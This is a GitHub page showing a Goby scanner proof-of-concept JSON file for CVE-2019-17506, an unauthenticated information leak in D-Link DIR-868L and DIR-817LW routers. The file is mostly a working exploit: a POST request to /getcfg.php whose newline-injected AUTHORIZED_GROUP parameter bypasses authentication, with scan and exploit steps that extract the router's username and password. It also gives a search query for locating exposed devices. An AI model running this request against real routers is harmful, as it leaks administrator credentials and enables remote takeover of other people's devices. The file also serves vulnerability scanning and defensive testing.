-
Notifications
You must be signed in to change notification settings - Fork 222
/
CVE-2019-17506.json
103 lines (103 loc) · 3.97 KB
/
CVE-2019-17506.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
{
"Name": "Dlink Info Leak CVE-2019-17506",
"Level": "2",
"Tags": [
"infoleak"
],
"GobyQuery": "app=\"D_Link-Router\"",
"Description": "There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.",
"Product": "Dlink",
"Homepage": " http://www.dlink.com.cn/",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [
"https://xz.aliyun.com/t/6453"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/getcfg.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<name>",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<password>",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/getcfg.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"PostTime": "2021-11-26 19:19:16",
"GobyVersion": "1.9.310"
}